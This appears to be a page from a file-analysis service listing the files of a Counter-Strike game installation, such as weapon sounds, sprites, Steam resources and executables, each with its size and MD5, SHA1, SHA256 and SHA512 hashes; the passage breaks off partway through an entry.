4b734d9385e8488462429ec4ce5e5317

SHA1
f2beef1d46ba5761284a55c0e5efbccc89ed9db2

SHA256
ee25642d00d071694c0ef8a89e75eb524ec90a79df8908df76911435571b6884

SHA512
8d661cf3db8adcb185c75764703d7d6f4b32a2ff7ecca1d6914b7e72789231a715ce5f41b07923fd1b7f239d8c5d50bfa5fafe9b531d4c8d469d8bfd652ba7ae

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\famas-2.wav

Filesize
60KB

MD5
a50e22ff3e45ba3cd3d8bab2ce45ed9f

SHA1
5d2d5e84574731fcc26619aed70df93443b80c1f

SHA256
02d5379cf520fbd574f9d6b69134f84a09255c6a1f3ec320c905d8e70942789b

SHA512
cdcf6a17ae944981b4f4681e2a49b078ad9da90830206482643c978a6266c73ec7d77080b941c7da129fdb555e3d5b39a9d04b7e5058793466c1c2fb99d8d463

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\famas_boltpull.wav

Filesize
7KB

MD5
9d534d7ccbda6dc0e47bdb72e716f9b0

SHA1
abdb00407f4063e8ff0bf146a4fbd1e0ddfd58e2

SHA256
f0fa216389e4b1ef7c0a7f0b8db4c6d246abb5fdfbefc4318e425c9c8399fddb

SHA512
356f84beca95a561c64ccc466dea0c6814aacd5eeed94fb196f437f512bf2517439e3f1e89aea766b00b47060da2455a552df302717d4669b2feec9fa7d8f87c

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\famas_boltslap.wav

Filesize
8KB

MD5
ee863ff30f0efbd0fb4c7e9083415d64

SHA1
385bd969d869ad7011b9690fb013a75b7bbd7ba5

SHA256
9c6e01989d1b4f101a7f911e0f59f17c585906a335fdfa38be6c489a85b9b1a7

SHA512
c0e9d236bf77c0e0d988473dcc52c9ec72c71d6585c78ea539fb4d5519278ab49e75649edfed817317152eb6c0115b42555bf3d887a77b3594fb2388a07218ff

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\famas_clipin.wav

Filesize
10KB

MD5
d8868bfcb4e6831deeb5137db40ae84f

SHA1
e2091a7b473d12ae8f446203a6445305618ac8e2

SHA256
ff821788730e6445b676e6fcf0d50cfb5695111d3f568c53f72c3639d5616955

SHA512
9d176286cb04bdef664b12893f83bc4e8cb6daa8c40473b5353ae79b2d25175d7d140b6084b2d2f0e69f3d4e225534f10d5de39feb7d43886eb8bb6770b8bd11

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\famas_clipout.wav

Filesize
3KB

MD5
349b78e5bd36f6f5a2c3bab8a474ecac

SHA1
d0a49fa09fa43a46f35447073b2d177f4e26f74d

SHA256
676625ec6e1b323243d0d62988606c7b3b509ffb2e5b6c2cbc9a225ace6f8f79

SHA512
a07dae9f0ae0e379d51d080e815430884c52bb24d3d70d23e375a8296981a8cd8d6606a5c135d8bcfdde11aea2de72175efd93260600b04211f5eac353aa0db3

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\famas_forearm.wav

Filesize
9KB

MD5
929fe892924ce546b9ce635fc03b2ef6

SHA1
6564c812792af93a31207eaf2adacb3f31660330

SHA256
fe8beacb5dde14a0566033d7e00bc9e247132e8051e0f0a100210cc4b2b02d36

SHA512
e262e10effa8a1667968c365276dd36e3a1361d0199d30a11a84b467e806bbac16f4a471fa028695d4e9f5acf9aed99ea56e78c15343a7a4e94ca5acfb5e27ea

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\flashbang-2.wav

Filesize
30KB

MD5
1d37be7a407e04655c1f4bba182de6e4

SHA1
38e4bc79f9eae8233597cdf0320fcabf08960ded

SHA256
2896c9cee195a7bbbe50b8193b53ba8fbd251e5a938389075f6d8aee186a06b6

SHA512
3f2d125479fa89d8be066a1828a80b6a5482cb25a108073e919de1bf399015c78ced4c0cfe778b5ac30bb3727f5844f7e59a23de1c04fab0e764eb721cae6756

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\g3sg1_clipout.wav

Filesize
12KB

MD5
66494ec485b910d91cf037bebb8a899e

SHA1
78f0c5ef25be0e261d035d98efbd44c17ef94f00

SHA256
523128273afaa928c151f46fe3f9f8d36d01bdb1fbc4118a7d80b64dea1ad1db

SHA512
a25c0dab97536fd467bef303de3e732224b7d4061331f1e6a3d053ebdf8e05c861535fd4dc8690c7f9a03bade835244b3f4f0b9133eeaaf4ca08ea551172af24

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\galil-2.wav

Filesize
70KB

MD5
4025c701a464fa6761de8bc3436aa769

SHA1
a4e49d4907d16f4bf04292a4c3287eab2634682e

SHA256
01c6de7d4f5b90e7f993ed2afff212e887df9bd7f0606f4aaa7a4673ae39665b

SHA512
3c3b8501d3c26feef2b093b1e30e974eed9965758185381a47e18239b28a3eb45a22c427de850ae67520c79963e6a78ebfd4b5912afa640ff9561e8c1b2ce45c

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\grenade_hit2.wav

Filesize
10KB

MD5
7e7c4656f8ef80a72ef0d1e41317f511

SHA1
775a6ec4f092b3e8bcb59c21787ef33e9237ae48

SHA256
ffdaf0a862ce1f47615dc1ac59af868010796eeef50de895414c40a04da3680e

SHA512
a257ce57532a8497f8df5860ae08729c78f90477f0b96264f2f98dc31ee034ec2679ace4ddf1ed4ad14ba08170354fa00e984e2dae4a17491fb5f8b7e009391b

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\hegrenade-2.wav

Filesize
70KB

MD5
f9ce1f567cfccb61b0b25cb689e1081a

SHA1
05e8b80c15e8d950088c6a54d8dc173d94c99260

SHA256
b77e091ade1982812d948aa0f853d8580a91112f71e1bfe48e50faa02fe408f7

SHA512
fc4764032911836f656be881de5cdf35464abc365e668ae104268f9cf47a435e5d0fe93bbfd526bab722e5d7355a0c7510261fbdde73415eb2d5dbb9ed1b04f1

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\m249-2.wav

Filesize
24KB

MD5
38aa27d5b03e3d9b357619e8433c4321

SHA1
fedf9dbc1c4ffcf5bdd259dbd10b0d70546a34aa

SHA256
d19add08916d098f0d97f20145ce80127731b3ab4703d96eeaf4dbc790d6048e

SHA512
322d7f261183175a9af949a47722bdd04cd8faeb004918542d93a4c11c27aa9d1a6bf332712972ea0b4f0c83b1ef7f57657bab8e741f79ca5c37b1d2f535664f

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\mp5-2.wav

Filesize
23KB

MD5
08b52490d54af93647d18cfd17702f0a

SHA1
6ea7794250709ec9583849ca734013d6a51a0cb3

SHA256
f448c5ede6b657e8e54a0dc95cf4df9335e59d81c67fe623ef7849d298fac87f

SHA512
e9fafaf54184c063af1e7759efc795e8af7bc72dcf43cecdd5d96cc3d2cfed1b12d5f1a9ab02ed004148bc05fc1c15139d234e82e76476410d552f58e681f85f

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\p228_clipin.wav

Filesize
14KB

MD5
2876bbba2adae9cf3456ea95a2c0b546

SHA1
737a3eff26b380e189ada33a028f63d75b8f0e8a

SHA256
2ebbea31183105b5d305027e960bb89dc2e2582b81ba712b01b1851501b6092d

SHA512
5423d77697905521a1718b2209a7e29fc34c94f481bf093f2ea45c3c43eb9dfce38fc8c87802c221a1813c582b626fd84446540178cba918d8e021d1b4b5dcfb

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\p228_clipout.wav

Filesize
7KB

MD5
3d352efef15d6f7019168991cff7cf32

SHA1
10030aa93a41d80b35d39e59dda86e4c164f1a5f

SHA256
616e07c58c0d3d332c3c7fe65c1b7e6ef49d5c26d09d8132d1e7c36c3899ea46

SHA512
bc51565450631d2954c0736c7899aa7111aa1584b0cd20ad239a765662d5935aec7fc7b33f3fcb2d43e5a69b1a9c9728a63a5a82134ee4dce7740cfa22e9480f

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\sg550_clipout.wav

Filesize
9KB

MD5
e4f0d92ee2ffcda3b464cf4934358e93

SHA1
5c5c79181331ac18ca710c586c70fa5d1236ccec

SHA256
61c2443035604b8bc34068e6fa2830de9a9ea43cddb5a4b5e4f714f0cf2ebdf6

SHA512
9ef010516cd30af7d64a366cced0667304fbd405913a5fe7d970e9de0a7cef44c06ce00dba7ba047472c1037847c068fe77f9151340150c701a1916912da304e

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\tmp-2.wav

Filesize
5KB

MD5
50b1527eefedeeb9062fdcdcfd37202a

SHA1
d9af14a67d6c099734b14b2889d1e86383b989e3

SHA256
ad639a5078516499cbccee2600b5ce084643e5aeeea336340862f6fcf5608d2a

SHA512
45b9f6a0e7683c463d8ab81f429eec404bc167df076afc6b82deb652d947dd8c8ffb7ffdc3f68f94273d3a87ab37d8897cbb732fc17097af7f8d678f32878837

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\ump45_clipout.wav

Filesize
3KB

MD5
823dde376e26c72a64bb70fb2e8a45ca

SHA1
301edb3ce6d3b2393d049b65eab9a9bfc28fcf1b

SHA256
ed42a1b2b755015baeb5396a6991e5d2e66dd9b234db3ae414d52ee63ff5e5ab

SHA512
c27d42032e598bc989ea19ed42f34891586904f0944901ecba8765ec5e182786419760129bff68155a7a565b352c7a9e5ddd2d03a82865ef1dbd0b07f3505f6a

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\usp2.wav

Filesize
5KB

MD5
7fb87870fdbfcc2e3529fe601fe40377

SHA1
76b933a95ae595ca537fcfc35b1f3ee18dc77e91

SHA256
20fae7d8f92159564ce249509d28f3557ec3ab850080b49eca21119e09722456

SHA512
14715cea5796851e8a94964ec36b961be1749583bc76ae53e46f77acbc5f58c7e600c33e8d3bf33d70cb6c08014f05639b6910c37a86f52e0c9925f41ccdd416

Download Submit
C:\Counter-Strike-Original\cstrike\sound\weapons\usp_sliderelease.wav

Filesize
10KB

MD5
44576162dc98c5a0e265a6dea7872599

SHA1
7ab27058d4166d603c51df914d62c0dc4c937bdb

SHA256
89bc64b6711ab12cd20a570174dddb6b48b35bb4e953dec8e1b4711a0d985d34

SHA512
91c8aab8e6e1024e75c24a56238b775016ff48bac6dd12035aaf61e1ca210bd4a40d8f5feae60ed1b0541617497aef8f21525d5a47d1cdd83be5e1a67985ce8c

Download Submit
C:\Counter-Strike-Original\cstrike\sprites\640hud6.spr

Filesize
64KB

MD5
56d776f44221d97129d22368a38e744b

SHA1
f23f02b40c3842c9b59d8063ba6d44a525fb482e

SHA256
bc84cf45f5a024656d55d9bab18ed94371479533766a053f23f5acadbb03e281

SHA512
fbd1c775bdff709eaa7230ab7b0a741aded362824263656025deb6c879f76503e80f2e27ad4984998cf3674e08d044b87f5adf69775fb9b2b1c0c900e7efbe86

Download Submit
C:\Counter-Strike-Original\cstrike\sprites\black_smoke4.spr

Filesize
153KB

MD5
0c7375ae29b0bdb8edf1ad0e8d87ed04

SHA1
b6ea11907a1b6c5508d69d8a10eee2c9a12f6c36

SHA256
8539f22177ae5ec673316d76939211dc9dc1c1c2dacdb6a52e100e1e7d5c15ea

SHA512
b229f19709d0e0cf923cd82420ad25ec308e8aed9996013e591e1d01948e1fb6235b5f94e1d46a26b67738cbea5f46ab6340983938a633a31cfd51230dcc1c26

Download Submit
C:\Counter-Strike-Original\cstrike\sprites\grass_01.spr

Filesize
16KB

MD5
a3736fc24792ff7e85569854d68ad7c3

SHA1
bb007f7b7937ccac253e2277039026ec2a5f47c6

SHA256
14384ddb6bd6d7d1fa0ae8ce08a59ace2e3c5fa95b6877475d7fb18fd6db4284

SHA512
d5a0849d6c5edd5b3513ddc8e0862a9f168ad61adf3d3797d823d7f45b8de56380050506cf8707ad8488404633a353fdf084e748179f44841855e0a194074fb5

Download Submit
C:\Counter-Strike-Original\cstrike\sprites\pistol_smoke2.spr

Filesize
361KB

MD5
cb5216837325d496cbf150594942534f

SHA1
62d923c10fc29c396637be0721215bd041216a87

SHA256
e53dcbe0ef346df5517ee76c1b38f3968f380ce390887ebb139ef3a5659e24d3

SHA512
0c949cc2df71d37c7e23df9b1ba4938ce72d330ce4960031ef927353d1026caf2c3bdd7ca60b0d424f0c20241b5cae46a74671c5f35ca72e8ef2ba41c6ce9587

Download Submit
C:\Counter-Strike-Original\hl.exe

Filesize
84KB

MD5
2098ccf443433129b556c2849fe99e26

SHA1
074ddbaff48c88b3b5c8f881c35d2be2bb19a249

SHA256
4a899986a879ffd4b7e2d819c49b47cb362d849e86917da1f1931ef476b414af

SHA512
fb4dcfd5371c89af775367d9f2ba72bfd42f8b483ba31b0e839b66f065e5e7a1ec34bf4504aaad17e38502be6917f0b3e415add81dc84fc6942996c0a8f95a10

Download Submit
C:\Counter-Strike-Original\platform\Friends\icon_offline.tga

Filesize
1KB

MD5
08091f474e938ea73aac90c9773a6013

SHA1
c4ff881bf1c3f0f0db3bd58f47d666df6a0ff885

SHA256
50443605d94d7bedbb03c2200d7cb7e98b0eaa91e3489cd7d77f69a407b73e0a

SHA512
7f569511d12a36fdcf6193aa52a2845b53f6d2a2e075426708f542f0012360a48cdc520ec6b26b0d1dd9f86c0ba41c8205483d340963aa0acfbaaca03a7ee0f5

Download Submit
C:\Counter-Strike-Original\platform\Friends\trackerui_koreana.txt

Filesize
32KB

MD5
a12febfaf76faa8724f0818112ec7d1c

SHA1
102231db7da26eddcaecf1cc57eb7f1705ab6ab2

SHA256
7dd1c65299103398375aa4d2c537a0cc2aec051e002769002214903fd5796001

SHA512
1a789c67722260c8cf2f944b8832362d4b97926fcb1c382022eb1ec2467c571ec7e9059a5b1e3bdfe06d900ddd955ca3f95c6733ed333a941e8c54f1b6fd3d8d

Download Submit
C:\Counter-Strike-Original\platform\Servers\game_ready.wav

Filesize
8KB

MD5
25d68bc70c2b5463fe98d6ffec5c2866

SHA1
86e025f7d060aec0d47fe062f6340dbb05519e79

SHA256
9f839221582b729c925b1be1c6c09a4006d47566d6f9ff580337af1539b3679b

SHA512
97369a9fe1f775591c189edcf8ab71801c9cec41c2c32708812fee2457684367818e58230af94e03389dc9409854e5f4d3d07861b93f227f4b7797a7a3972088

Download Submit
C:\Counter-Strike-Original\platform\Steam\cached\PreloadSubscription_ActivelyPreloading_Payed_NotPlayable.res

Filesize
2KB

MD5
9797ccddca9b1e80121f5ee479352c97

SHA1
86422037a3ea6f459de4ed179d3f0dee9887439b

SHA256
7461a89e4f4ae9695907c5c35440a96b5d69c3aa35671ca65ecdeacb29136f87

SHA512
b7b863a6f196afa3564fde6b1c52d0133e655f7afa34b5820549eda5fa2336527f3138ab013164660fad8f9244c9243d861463d18df7fe1a33c6141af2b1e531

Download Submit
C:\Counter-Strike-Original\platform\Steam\cached\PreloadSubscription_NotPreloading_Payed_NotPlayable.res

Filesize
2KB

MD5
369af8febb9873bdeeaac56849aa5edd

SHA1
c6efbc06e5f70605e4023dfa469d4891734898d8

SHA256
274dc979c3ce26ccb18b3c8dc38e79b31a1fded218f2fecaa460760a72afe0ed

SHA512
be7868ae847fc457788bd1eb77522f44505e9894a2c18e6516dc696dabc38748ffe9ad2a1aacaa4c163588b68ace93a4bf8d921ff8036798d36cb216ada32360

Download Submit
C:\Counter-Strike-Original\platform\Steam\cached\PurchaseSubCreditCardDiners.res

Filesize
2KB

MD5
18581b2844d1b35bd0dc170f8557bc42

SHA1
05e8657b8f73f2608aeb07edd8f469f3639d29b7

SHA256
7f00fc14809350a11d04cb655e996beb4d829ae7c2d7ca320968661961e18fd2

SHA512
cb2be96b5ae7cc5c593f954092ec663b8ff41e06f2597b24bbec8883a025baa75bbc6c15cb24fa29389e05b7bdb0d017bb47ef747a524eea53b77fb4a479087a

Download Submit
C:\Counter-Strike-Original\platform\Steam\cached\creditcard_back_amex.tga

Filesize
69KB

MD5
e5e3a9fa341ffe9e575953fe0a0aea24

SHA1
7755b4a3004cfdb1763c03f5b92b0eeefde003b7

SHA256
824cd8b850e621062e7e9276f494ac5f077bd7b90cae1c54822b4cd9ded100c5

SHA512
ae33a0c016111e0ff9e4d74c651d6ecef7e373df0a839063572ffe8678a54f88c61285a9694c9a2d3208b6b8c76fff2e72cf5f19beed699bc5beea07a16395a6

Download Submit
C:\Counter-Strike-Original\platform\Steam\drivercheck\240\dxsupport.cfg

Filesize
123KB

MD5
f4eb527c235bb256418442880e445f39

SHA1
ead5903daaf37141965be8a41a535a82e7bb791c

SHA256
9b93979bfb94347d3157cdca038d1a6addc8564a954bcc564adef6a1c86ebc22

SHA512
59a32b9a93afc69137ff4ce1ce0569eb46c0e7512afc2435cf94e94b2fbbfae320059779901c703374b018da7297caf44bf6b5a42fe16154c01270bfdbc24a9f

Download Submit
C:\Counter-Strike-Original\platform\Steam\drivercheck\240\dxsupport_reqs.cfg

Filesize
129B

MD5
158ac9a69c9a06d9bc2fb432d5b63f38

SHA1
c55441b50d6e5bbf1b619ce7c84789439c545110

SHA256
ddbef05c1fa1eb6c13538306f2d28bffb61dc57e7a9e3d9e25b98dec576ca8a6

SHA512
c3e6fbcd0338c1d04fada0c66123f1c21663f25c9f66161f18817bb6c10f9a79034ab3b0e458e1dda61bc915e3f76eb88e1238b04468a277ab16bd0f0911a1e5

Download Submit
C:\Counter-Strike-Original\platform\Steam\games\Half-Life 2.ico

Filesize
21KB

MD5
fa223dc178f827155f6a1dbbac6dc762

SHA1
f3389f48f7477f746f8c898e500aed255e662749

SHA256
2effe91cd1e8777ea7c12417003d8279f3657dc0732cad23ef042e7bcdfff4c4

SHA512
ebeac290694b703b9371aca29a4809d50bef1b229c6ae4248a9da08a7203375728746074d85ed73dffcc712bf74d1693c145d17bbe99f1bf2015f0476e0f4e0c

Download Submit
C:\Counter-Strike-Original\platform\Steam\games\condition zero.ico

Filesize
7KB

MD5
3485998ef1bbf8ccc866af56eea206f8

SHA1
cd0ee6cb22904e712f408576a4fe9e74e045e098

SHA256
ef29dbcd5c163b52dbc9bb1a403653708507e601ddd827971928edb640235490

SHA512
eac31c91f1143be9c3300a25a2959c410533fff023a74f191af7ffe97e688b2fb8682902f94d9c4eb302e4952e969e24685395b8b7a886405d99d2bffa5c7a15

Download Submit
C:\Counter-Strike-Original\platform\Steam\games\half-life.ico

Filesize
4KB

MD5
f02c1d45a1a86f5d60ce9e310e24d144

SHA1
d991f95d96e1c76d2acb944bb09447628cd96caa

SHA256
01491c012c29f4706f0cc8f1117eb0f882b54f720bfbf320a3271ffac6c929dc

SHA512
88dafe4039264818c4193f563376db890ecea2f8f67df7902dd76aacd08be4cb47197257d02217eeec1a81295615b30b89e91d097837193a8fb64e72d03d7334

Download Submit
C:\Counter-Strike-Original\platform\Steam\games\icon_lostcoast.tga

Filesize
1KB

MD5
0b5cc5aecf0b47e2886c384908532dbe

SHA1
add589f862a5fb871f8c84871501791b5dfb3c62

SHA256
e5972753625daccf5bd9b735261b60375b5f46cc5adcc8d1c18fd36cde5d7d1c

SHA512
859647325ab25bb1d412001bf425babbc720c7cb72c3255768fcd03b29b34908f68946478f5855e96358de74230aac396559411d71860c0e5bf5414929a69d6f

Download Submit
C:\Counter-Strike-Original\platform\Steam\games\icon_lostcoast_dull.tga

Filesize
1KB

MD5
200380f4259d09ec3f433e421cd5a55f

SHA1
9afc9cf71fd5949198b77bf7ec396a89058d6dee

SHA256
e136089e82c2d98a7283b55dcd93c5332a332149e7119d015bb7c353435ea9c6

SHA512
c77a433055077420eae1fcae302fc0738f592b8081ba2bdcae2015a3296672f1df2518934821d424e3a8c9535bf1891cbe7394c16ac68520099a3d7dfb4c50cf

Download Submit
C:\Counter-Strike-Original\platform\Steam\games\icon_sourceSDK.tga

Filesize
1KB

MD5
5293c8b26b32fea1972f3a53a62fd307

SHA1
81c749f4232d97300636281e28c6236ca3d589e5

SHA256
d55509e345d96fa54092b7cd9b46a9ec6e6a2b249ce71048e5edfbaef7fbb6fd

SHA512
427328c999947a45a839e0679e4e4d62041dfe8ffeb32702c7511cf3ad5442d6e5f63a5a6f0749a28e08eedb162fe34a429d7dd192bc4d1f0565398cd78fd317

Download Submit
C:\Counter-Strike-Original\platform\Steam\games\icon_sourceSDK_dull.tga

Filesize
1KB

MD5
8f365d1e50c281639030d5d324d34cbe

SHA1
42c9ded0015e890e2de60093cf61bac99d4da5f6

SHA256
b91bcaf3aa2e26c0454f709f99ff45349fbb1be2baa7094d1298b217440ff32f

SHA512
12cb7fd74ca7797b83a740cb8ea0a1ddcf0dde1ccf9c84e1af7134f402c58b7e5e1c310c9cb0d5d44aaa751e5b7b5af6a4414a5f4dd530c3b909a0f1966566e6

Download Submit
C:\Counter-Strike-Original\platform\config\MasterServers.vdf

Filesize
216B

MD5
c467703f8454a779c63abdba998674ef

SHA1
e338667d409226bec7856d38128ea64fe676bb7f

SHA256
31dda59b534b9a088ed25a91f35ebfecff862fc09db3829c92b6d8938dbc1abf

SHA512
fcba93f882ef30819d9f3509b1f9273af877206cc8d87c22cc0e8714a6524e5e597679ae6ca0525cdc05d05d76f319b8a5f9cfbeeb7545211242fedc2a755d37

Download Submit
C:\Counter-Strike-Original\platform\config\rev_MasterServers.vdf

Filesize
122B

MD5
5ff5a9d6740c693ffad23f7bc3884c79

SHA1
3bf4c41aa7f5c0af56c04007ab377f129852840c

SHA256
7550b3cd39ae48e53948fdca99686a9527904c25e40f96470399e3b4515d164d

SHA512
9f0c50bb089162c26e6ca03651718c8cbe994c8c3b39c38fa1ec571dd203120f30b00245f9c2162bcea47ca3d4cd41e240f8377cb8dfc8595f8bc577a5cadc80

Download Submit
C:\Counter-Strike-Original\platform\materials\debug\debugsolidmodelhulls.vmt

Filesize
109B

MD5
9740483914ed241cb2786354e7fb5975

SHA1
3200274138b210b86bbe5c588f85f2fc6b20f939

SHA256
da23f86d607d9d1d3464b3dfc92948510444163eb796a68ec8d41f5de7b992d5

SHA512
876d9040eb6c1589a4b029c0d59216a9bdca34d605f27342d84349d336a84aa30d4df54d7ce1208df771807fb6e4f5b08c3405d6d78524a9f632171468e78bbf

Download Submit
C:\Counter-Strike-Original\platform\resource\icon_steam_disabled.tga

Filesize
812B

MD5
97aa3cd889927305353d17e9eba5400c

SHA1
eb0ad0458ac1d68c29564e6bc93c996557859155

SHA256
eedc081196215a8f694e3cb372ebe392180af65ae4d08991fa2eb6a104a53bf6

SHA512
b9a69319b8bf97bff161ec27d1a20a179d4c06ca7a324621e83e3e10bc97f71cc5f907288701e39324c697417adad895374abadfead71db4135359704e0126a7

Download Submit
C:\Counter-Strike-Original\steam_appid.txt

Filesize
2B

MD5
d3d9446802a44259755d38e6d163e820

SHA1
b1d5781111d84f7b3fe45a0852e59758cd7a87e5

SHA256
4a44dc15364204a80fe80e9039455cc1608281820fe2b24f1e5233ade6af1dd5

SHA512
3c11e4f316c956a27655902dc1a19b925b8887d59eff791eea63edc8a05454ec594d5eb0f40ae151df87acd6e101761ecc5bb0d3b829bf3a85f5432493b22f37

Download Submit
C:\Counter-Strike-Original\valve\cl_dlls\GameUI.dll

Filesize
825KB

MD5
7050fafa87936d6a22b445b2252c2364

SHA1
eef08a9359dfc428b567d56528edfc2de6fb9120

SHA256
5359ffc4589711c625f88ba717391a05cfa91ce273e580a26e27298ad91f38ec

SHA512
50d962f491678bd900a33f889e751573a60aad70744b09fdb2de5a5433246589f45068c600e13529e99789a2e8d580d67bdde37e88db6fed78146b6582f157ae

Download Submit
C:\Counter-Strike-Original\valve\events\crossbow2.sc

Filesize
1KB

MD5
8cfcc0a84d0b6b51995ce17bc9f194f2

SHA1
f86d5edad7e5a3e2d994517da5ebd7d748a8c666

SHA256
2c7d43b8dc6ea01a32acddb7798b9dabf0ec44c7a6dcf75160539a7fe53e029d

SHA512
5f75243ff3e13b557859d89593432f5e29f014f2bc527bee363be3369e884feccb15ee593094c7eb0f8e4786b6a352cdf9fc6039636782cd23712cadc114ee1b

Download Submit
C:\Counter-Strike-Original\valve\gfx\palette.lmp

Filesize
768B

MD5
5fb93560c8ae637ba463d084b0ec505e

SHA1
1b2a6a5bb0a579b0f3df9cb6c6152a9c65cb9e62

SHA256
036b7ea3c8c03be214bb7d22b8d63ac27f63d547e42ca677fef344ddc780961e

SHA512
0883834f1150791b4e060e080e7a07eeb60310b88e0334db094c64af5f5b147ebd51cb1e3baa514ea53d286df9876df86d7d463c7e2675c14a5050d0be4003a9

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\1152_timer.tga

Filesize
2KB

MD5
6deae390d10e5faef07cb793138a4ea2

SHA1
0e1b89e5e5e61f5e8959d3d6e17fc874f3d14a8e

SHA256
1efacc8931f4e6558fc9f854527e25e004d8c3fd90f1f5209273236924a9241b

SHA512
70c1ab592e46440f759ffdaa2ba1bbb9206212670762fbdbeb04f85da2304120e0a052ea4164fc0e0326e82c013924d0db0ea27fc21041489fc6d6d69b69d93a

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\1280_arrowdown.tga

Filesize
1KB

MD5
cd89fd0107ed6c76e1fd0e9c11ec4617

SHA1
6f5f187108b235dd6fbf3218ba05b52cfce2a38f

SHA256
0c97e1d6a083ad204bae5ecd4e8b29ad97ec48cd932377094606b67aacc4dc51

SHA512
2a7050c21cdf75affc26b39e1f6e20774436af8124fc08afd54176d574c9c8b3c2b4d28ace11c1d9b775ae4bda0fb340a202854fe209408c125a941690a014ce

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\1280_arrowleft.tga

Filesize
1KB

MD5
6e3a6f819835ed86d2482dde1977edca

SHA1
1dfa68c5bf8c8d3d1dcf9f083b38205698cd7729

SHA256
2b203d84e0253d71fe2de06b430072f1f33c45b11a34625053859803f97b1422

SHA512
f6a41b7a789f88a7f78a0a563feec8371f4396fd95821136751f921d05d8a8af63a7aff9abe76c378ab6a8d27f2c90aee94e9c921afb15b73d381a861977fd02

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\1280_arrowright.tga

Filesize
1KB

MD5
a42119bb4749b3951b240c36a8d04abc

SHA1
d907e5f48ca812316c95d46c560742ad1b46a0c8

SHA256
a1fcee4ada231c29bc7957dd9a913fe788f632fb049f1bb4307f6a78fc61003a

SHA512
f49320861ea3ace9c67b06c7842acf3f38a4a6fa7c9390419f4b98a8d944706be5db4f38c1cba277ccfa151a20e0cbbf8dce1d19d3406e866e4dadf004d82840

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\1280_arrowup.tga

Filesize
1KB

MD5
2bd62a8772833f2d5450db895d664e61

SHA1
15d350619c9737624707d56536d775194348c6e1

SHA256
6e25ee365f0f7eae04736cf6a4461509c6b3310ef9ac250ae5dc008591e4c627

SHA512
4a763fe534dbecb5979263e54f9995d5d621cdb166b2f966552e1b2aee54a339f9782a47074f27abe39cf1ef26aaf9de862f464668fb0896232adf73684f2e0b

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\1920_arrowdown.tga

Filesize
1KB

MD5
3ba8009f5fe7d44a44085581bf452fb7

SHA1
bc4479ff25f3a44133b3521af2c74d3ea9c174ad

SHA256
2ec11caed5f1a7f27ec3e163f210dfc403579a80eac9044fdca87b35d96cf989

SHA512
f3447c164ef35abc8ef5e560e4600f9682bb4b4d188932ea704ec18d2c30d210cc95b6146ec34c9846ddeae03d8ac4000831dde6e8950221b2e01891408b1c5b

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\1920_arrowleft.tga

Filesize
1KB

MD5
aace3f2394f8de3358e8830c8a38a2bc

SHA1
c46024be49f337b76c0e86557620dfb5c281ffa4

SHA256
88bac6a026b4968863453efd64240ad13b94cbb70e519c36c37e8afb97859096

SHA512
80339d9b45f04a65ddc451c80fac25ab97281f7a7f7bdc2a817f070c9394f27d006bf95497991723e53533468bbcfd7fa197a8f25d5917a22e05b78dce30905b

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\1920_arrowright.tga

Filesize
1KB

MD5
3498dbc609accf33f9176f35683e9ad8

SHA1
bbac94fcb8ac6c22cb05d23060062709010a1b97

SHA256
94bc7f32eda56dab718a2e8790e4de25200fe1d11626c38d3068d287b6a1b78a

SHA512
b2e0880dcfcca7eeec2597f0ac147d328e818d90c145252cc5cb6005230c226b0de5a170a3dbd761067fbca094c409c4e85cad4c76f0c05c42c450efab11bb7d

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\1920_arrowup.tga

Filesize
1KB

MD5
7de26bb1432749154d7b7934a6aa6fc1

SHA1
c6918704f5e61e19aa2112c499ffb96fe02899c2

SHA256
b5073a6be382c7e04ba75d6239c653aed7eec2082dc907dc08288acf33cf4f52

SHA512
07848ed71d4f2e885f7e0cc803430ea9595e4417d8781079c88d947eaa2fa7ee2c24e4ee4a61a482fedb1f04f1cb74a3fe6b635a94999cf4c621e5d45c0fc711

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\1920_timer.tga

Filesize
4KB

MD5
8db670d55d945ddc8c58813d5c2bd1ab

SHA1
f345cc4d2e504e0a47a4428b605463f0aad0fc56

SHA256
dd5424ce7ba6978cb4b0368943e50896d6dcb18e08df3f0fbb8c942c27ddf27c

SHA512
14364b176fe43042fb2fe5d5acf536872c06212a76e0e6d5a5f93d0f87aa4201012f7d98a90770a04f43b62c3114a0fa30b3652137243fcb166724bece73011f

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\800_arrowdown.tga

Filesize
1KB

MD5
7c2e90b8793df88727a00b38f20fe5d5

SHA1
c0e55d97b26891043117567863dba7c7a8814b70

SHA256
c0e525382bc3b0fa03415e7db5bbfe2e0ac547ff921a0525fc284b0d6b072fdd

SHA512
5f34d05c36348eca7f453d158d4165dc865e4645266b722edd78e42371c53dd4a7792828cbb400f0c9513db8c8c69cf9f5542a9335e098bf20d27992ed3dcae8

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\800_arrowleft.tga

Filesize
1KB

MD5
a2ab48d4f11c9a3f89137d8593b8727f

SHA1
